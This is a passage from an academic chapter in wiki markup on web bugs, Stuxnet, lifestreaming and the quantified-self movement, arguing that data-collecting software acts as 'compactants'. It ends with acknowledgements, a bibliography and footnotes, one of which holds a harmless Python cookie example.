&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Chicago: Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp. 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
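&lt;br /&gt;
To make this exchange concrete, the following is a minimal sketch in Python (standard library only; the cookie name and values are invented for illustration) of a cookie being set by the server and then returned by the client: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
from http.cookies import SimpleCookie&lt;br /&gt;
&lt;br /&gt;
# Server side: build a Set-Cookie header registering the client's 'state'.&lt;br /&gt;
cookie = SimpleCookie()&lt;br /&gt;
cookie['session_id'] = 'abc123'          # the whole cookie must stay under 4 KB&lt;br /&gt;
cookie['session_id']['max-age'] = 3600   # expires after one hour&lt;br /&gt;
print(cookie.output())   # Set-Cookie: session_id=abc123; Max-Age=3600&lt;br /&gt;
&lt;br /&gt;
# Client side: the browser echoes the cookie back on subsequent requests.&lt;br /&gt;
incoming = SimpleCookie('session_id=abc123')&lt;br /&gt;
print(incoming['session_id'].value)      # abc123&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;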
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
